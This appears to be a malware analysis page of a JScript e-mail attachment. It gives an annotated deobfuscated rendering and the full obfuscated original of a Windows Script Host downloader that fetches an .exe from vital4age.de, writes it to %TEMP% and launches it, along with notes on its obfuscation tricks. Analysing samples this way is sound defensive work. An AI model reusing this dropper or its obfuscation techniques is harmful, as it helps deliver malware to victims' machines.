Malicious script I got in an e-mail
// Analyst's hand-deobfuscated rendering of the obfuscated script that follows on this page.
// Behaviour visible here: fetch a file over plain HTTP, write the raw response body to a
// fixed path under %TEMP%, then launch that path. It relies on ActiveXObject, i.e. it is
// meant for a Windows Script Host / legacy-IE JScript host, not a modern browser or Node.
//
// Indicators present in this sample:
//   - download URL   : http://vital4age.de/v4v5g45hg.exe
//   - dropped file   : %TEMP%/CBMQFs.exe
//   - COM ProgIDs    : WScript.Shell, MSXML2.XMLHTTP, ADODB.Stream
// Detection angle: a script host instantiating ADODB.Stream and saving an .exe into %TEMP%
// followed by WScript.Shell launching it is the whole kill chain; each step is observable.

// WScript.Shell gives environment expansion (below) and process launch (end of script).
var shell = new ActiveXObject('WScript.Shell')
// MSXML2.XMLHTTP is the HTTP client used for the download.
var xhr = new ActiveXObject('MSXML2.XMLHTTP')
// Destination path: %TEMP% expanded at runtime + a fixed file name.
var virus = shell.ExpandEnvironmentStrings('%TEMP%') + '/CBMQFs.exe'
// Runs when the request's ready state changes; writes the body to disk once it reaches 4.
xhr.onreadystatechange = function () {
// NOTE(review): property spelled "readystate" (lower case) here and in the obfuscated
// original; COM dispatch lookup is presumably case-insensitive, so this still resolves.
if (xhr.readystate === 4) {
// ADODB.Stream is used so the binary response can be written byte-for-byte.
var stream = new ActiveXObject('ADODB.Stream')
stream.open()
// 1 = adTypeBinary: treat the stream as raw bytes rather than text.
stream.type = 1
stream.write(xhr.ResponseBody)
stream.position = 0
// 2 = adSaveCreateOverWrite: replace any existing file at the path.
stream.saveToFile(virus, 2)
stream.close()
}
}
try {
// Third argument false = synchronous request, so send() blocks until the download completes.
xhr.open('GET', 'http://vital4age.de/v4v5g45hg.exe', false)
xhr.send()
// NOTE(review): in the obfuscated original the method invoked here resolves to the array
// entry "Run" (WScript.Shell.Run(path, windowStyle, waitOnReturn)); "RunActiveXObject"
// looks like a transcription artefact of this deobfuscation, not a real method.
shell.RunActiveXObject(virus, 1, false)
// Every failure (download, write, launch) is swallowed; the script exits silently.
} catch (e) {}
// Obfuscated original of the downloader above. Obfuscation techniques visible in the text:
//   - comma expressions like ("ignore","erica","savior","gW") evaluate to their last operand,
//     so every such group is just a string fragment padded with decoy words;
//   - the marker "dugout" is spliced into key strings and stripped with split/join;
//   - the fragment array is reshuffled with splice() so index arithmetic hides which entry is used;
//   - globals such as ApBcVkzVRDu, OjTFnNmRQ, ... hold fragments of jQuery's Sizzle source
//     (e.g. "uniqueCache", "Sizzle.error") that are assigned but never read — pure noise;
//   - the ActiveXObject constructor is looked up via this[...] so the literal never appears.
// Resolved values are noted per line below; they match the deobfuscated rendering on this page.

// Decoy: never read.
ApBcVkzVRDu = " ...in a gzip-friendly way node = parent; outerCache = node[ expando ] || (node[ expando ] = {});";
insecureI = 0;
// Helper returning the first character of a string; used to build "p", "s", "n", "d" below.
String.prototype.positioning = function () { return this.substr(0, 1); };
// Fragment array. After comma-expression evaluation the entries are, by index:
//   0 "SAiusgW" (decoy)        1 "YLSmdzIpL" (decoy)      2 "ExpandEnvironmentStrings"
//   3 "%TEMP%"                 4 "/CBMQFs.exe"             5 "Run"
//   6 "ActiveXObject" (with "dugout" markers)              7 "jdixFLw" (decoy)
//   8 "pSTgRw" (decoy)         9 "WScript.S" (markers)     10 "NAXOvpX" (decoy)
//   11 "hell" (markers)        12 "AjkObRyb" (decoy)       13 "PgjcOksYvkN" (decoy)
//   14 "MSXML2.XMLHTTP" (markers)
var JjusVCax = ["S"+"Ai"+"us"+("ignore","erica","savior","gW"), ("harvey","ineffable","melbourne","transept","YLS")+"md"+"zI"+("fabric","probe","refined","foamy","pL"), "E"+("cherokee","possession","xpan")+("orlando","haystack","elfin","ottawa","dE")+("chair","session","nv")+"ir"+"onmentSt"+("finland","recalcitrant","conversation","ri")+("curry","continuously","ngs"), ""+("grapple","slake","cheapest","%")+("aberration","thunderbolt","textbooks","TE")+"MP%", "/CBMQFs" + ""+("anoint","seaweed",".")+"exe", "R"+("remix","badinage","un"), ("regional","points","Actdugout")+("compare","insidiously","amidships","iv")+"du"+"gouteXdu"+("shelf","mounts","settlement","go")+("species","exclusion","utOb")+("solidarity","telescope","du")+"go"+("unabated","generated","pithy","arcadia","utje")+("spread","calendar","wallis","obstruction","du")+("teamster","errol","dualism","services","go")+("chips","imperil","dialogue","ut")+("lustrous","commissioner","guinea","threatened","ct"), "jdixFLw", "pSTgRw", ("augment","trespass","W")+"Sc"+"du"+("characteristic","creeper","goutript")+"dugout." + ("bombard","absolved","overrated","S"), "NAXOvpX", "h"+"dugo"+"ut"+"el"+"du"+("heath","workhouse","compressed","go")+"utl", "AjkObRyb", "P"+"gj"+("nudity","apostolic","cO")+"ksYvkN", "Mdu"+("reservoir","ethiopia","go")+("scout","hovel","trinity","ut")+("install","vision","SXdu")+"gout"+("maybe","tolerance","MLdugout2") + "."+"du"+"go"+"ut"+"XM"+("college","killer","prosy","du")+"go"+"ut"+"LH"+"du"+"go"+"ut"+"TTP"];
// Decoy: never read.
OjTFnNmRQ = " Fallback to seeking `elem` from the start (diff = nodeIndex = 0) || start.pop()) ) {";
// splice(7, 2): drops the two decoys at 7 and 8, shifting later entries down by two.
JjusVCax.splice(7, insecureI + 2);
// Index 6 with the markers removed -> "ActiveXObject".
ugliness = JjusVCax[2+2+2].split("dugout").join("");
// At top level `this` is the global object, so this resolves the ActiveXObject constructor.
var gLyfdlw = this[ugliness];
// Decoy: never read.
XkGGnvVviQQ = "pKmmYpEOYek";
// First character of "pXvhVWdbVOPSi" -> "p".
sensitive = (("reiterate", "michael", "KaqiMeljdT", "assisted", "pXvhVWd") + "bVOPSi").positioning();
// First character of "sVmfMHeEHUuoPRtHLYcn" -> "s".
prestons = (("elopement", "integral", "bNVmbVTY", "auditor", "sVmfMHeEHUu") + "oPRtHLYcn").positioning();
insecureI = 6;
// Index 7 ("WScript.S" fragment) + index 9 ("hell" fragment), markers still present.
JjusVCax[insecureI + 1] = JjusVCax[insecureI + 1] + JjusVCax[insecureI + 3];
// Overwrites index 8 with another decoy.
JjusVCax[insecureI + 2] = "UghOKppVbXn";
insecureI++;
// splice(8, 3): removes indices 8..10 (the now-consumed "hell" fragment and two decoys).
JjusVCax.splice(insecureI + 1, insecureI - 4);
// Index 7 with markers removed -> "WScript.Shell".
JjusVCax[insecureI] = JjusVCax[insecureI].split("dugout").join("");
// new ActiveXObject("WScript.Shell")
var Bgehhk = new gLyfdlw(JjusVCax[insecureI]);
// Decoy: never read.
ElIQpsWrhTy = " cache = uniqueCache[ type ] || []; nodeIndex = cache[ 0 ] === dirruns && cache[ 1 ]; diff = nodeIndex && cache[ 2 ]; node = nodeIndex && parent.childNodes[ nodeIndex ];";
insecureI++;
// Index 9 with markers removed -> "MSXML2.XMLHTTP".
JjusVCax[insecureI + 1] = JjusVCax[insecureI + 1].split("dugout").join("");
// new ActiveXObject("MSXML2.XMLHTTP")
var VrMzrLLlD = new gLyfdlw(JjusVCax[insecureI+1]);
// Decoy: never read.
elVCEpWQK = " Support: IE <9 only Defend against cloned attroperties (jQuery gh-1709) uniqueCache = outerCache[ node.uniqueID ] || (outerCache[ node.uniqueID ] = {});";
// insecureI becomes 4.
insecureI /= 2;
// shell.ExpandEnvironmentStrings("%TEMP%") + "/CBMQFs.exe" -> the drop path.
var boqCakIHC = Bgehhk[JjusVCax[insecureI-2]](JjusVCax[insecureI - 1]) + JjusVCax[insecureI];
// Decoy: never read.
afWWWOpLSwq = " while ( (node = ++nodeIndex && node && node[ dir ] ||";
// Ready-state handler: once the request completes, write the response body to the drop path.
VrMzrLLlD.onreadystatechange = function () {
// Property name assembles to "readystate"; 4 = request complete.
if (VrMzrLLlD["rea"+"dy"+("coterie","haphazard","actuality","st")+("abdication","elect","ate")] === 4) {
// "ApODB.Stream".replace("p", "D") -> new ActiveXObject("ADODB.Stream")
var sJQvR = new gLyfdlw((""+"A"+("structured","auditorium","pO")+("herbage","hughes","cyclone","S")+""+"S"+"tr"+("sanity","traditionally","statistical","astute","eam")).replace("p", "D"));
sJQvR.open();
// Decoy: never read.
lFJQvFf = " When found, cache indexes on `parent` and break if ( node.nodeType === 1 && ++diff && node === elem ) { uniqueCache[ type ] = [ dirruns, nodeIndex, diff ]; break; } ";
// 8*(4-3-1)+1 = 1 -> adTypeBinary.
sJQvR.type = 8*(4-3-1)+1;
// Decoy: never read.
RaHCKzsLqKb = "} } else { Use previously-cached element index if available if ( useCache ) { ...in a gzip-friendly way node = elem; outerCache = node[ expando ] || (node[ expando ] = {});";
// stream["write"](xhr["ResponseBody"]) — "s" comes from the prestons helper above.
sJQvR[("frontpage","tramadol","w")+"ri"+"te"](VrMzrLLlD[""+"R"+"es"+("memory","replacement","benighted","pon")+prestons+"e"+("parts","scalp","bunch","grotto","Bo")+"dy"]);
// Decoy: never read.
nMkCSsvh = " Support: IE <9 only Defend against cloned attroperties (jQuery gh-1709) uniqueCache = outerCache[ node.uniqueID ] || (outerCache[ node.uniqueID ] = {});";
// ("p"+"oDition").replace("D", "s") -> stream["position"] = 0
sJQvR[(sensitive+"o"+"Di"+"ti"+("extricate","keyword","damage","on")).replace("D", prestons)] = 0;
// Decoy: never read.
vbbnPY = " cache = uniqueCache[ type ] || []; nodeIndex = cache[ 0 ] === dirruns && cache[ 1 ]; diff = nodeIndex; ";
// saveToFile(dropPath, 2): 2 = adSaveCreateOverWrite.
sJQvR.saveToFile(boqCakIHC, 2);
// Decoy: never read.
SMTqKOY = "} xml :nth-child(...) or :nth-last-child(...) or :nth(-last)?-of-type(...) if ( diff === false ) { Use the same loop as above to seek `elem` from the start while ( (node = ++nodeIndex && node && node[ dir ] || (diff = nodeIndex = 0) || start.pop()) ) {";
sJQvR.close();
// Decoy: never read.
xtmwwD = " if ( ( ofType ? node.nodeName.toLowerCase() === name : node.nodeType === 1 ) && ++diff ) {";
};
};
try {
// Decoy: never read.
ivSbyvgX = " Cache the index of each encountered element if ( useCache ) { outerCache = node[ expando ] || (node[ expando ] = {});";
// xhr.open("GET", "http://vital4age.de/v4v5g45hg.exe", false) — false = synchronous.
VrMzrLLlD.open("G"+("phalanx","forbidden","mainstream","trauma","ET"), "htt"+("circumstances","animosity","p://")+("authoritative","spectrum","schooling","vi")+"ta"+("quantitative","profligate","binary","denomination","l4")+("confounding","write","caricature","levitra","age.de")+("cyber","sequence","affluence","/v4v5g")+"45"+"hg.e"+"xe", false);
// Decoy: never read.
kXTvYF = " Support: IE <9 only Defend against cloned attroperties (jQuery gh-1709) uniqueCache = outerCache[ node.uniqueID ] || (outerCache[ node.uniqueID ] = {});";
// "s" + "e" + "n" + "d" -> xhr["send"]()
VrMzrLLlD[prestons + ("villas","supervision","medicine","e") + (("lectures", "statistical", "UAcRDQK", "sound", "scrubs", "nyNjfyfXKxb") + "FtNATMOQfLT").positioning() + (("drainage", "scanners", "bQerVtKQq", "astronomy", "ivory", "diBJmayWmnv") + "gaUgahfN").positioning()]();
// Decoy: never read.
EXDkho = " uniqueCache[ type ] = [ dirruns, diff ]; ";
// JjusVCax[5] = "Run": shell.Run(dropPath, 1, false) — the string comparison is always false,
// so the launch does not wait for the child to exit. The trailing assignment is another decoy.
Bgehhk[JjusVCax[insecureI+1]](boqCakIHC, 1, "McqMjBUl" === "PHLpSRy"); xdVphT = " \"PSEUDO\": function( pseudo, argument ) { pseudo-class names are case-insensitive http:www.w3.org/TR/selectors/#pseudo-classes Prioritize by case sensitivity in case custom pseudos are added with uppercase letters Remember that setFilters inherits from pseudos var args, fn = Expr.pseudos[ pseudo ] || Expr.setFilters[ pseudo.toLowerCase() ] || Sizzle.error( \"unsupported pseudo: \" + pseudo );";
// Decoy: never read.
hUQjlUlE = "} if ( node === elem ) { break; } } } } ";
// All errors (download, write, launch) are swallowed, so failures leave no visible trace.
} catch (nGDSVs) { };
// Decoy: never read.
qfjWze = "} Incorporate the offset, then check against cycle size diff -= last; return diff === first || ( diff % first === 0 && diff / first >= 0 ); } }; },";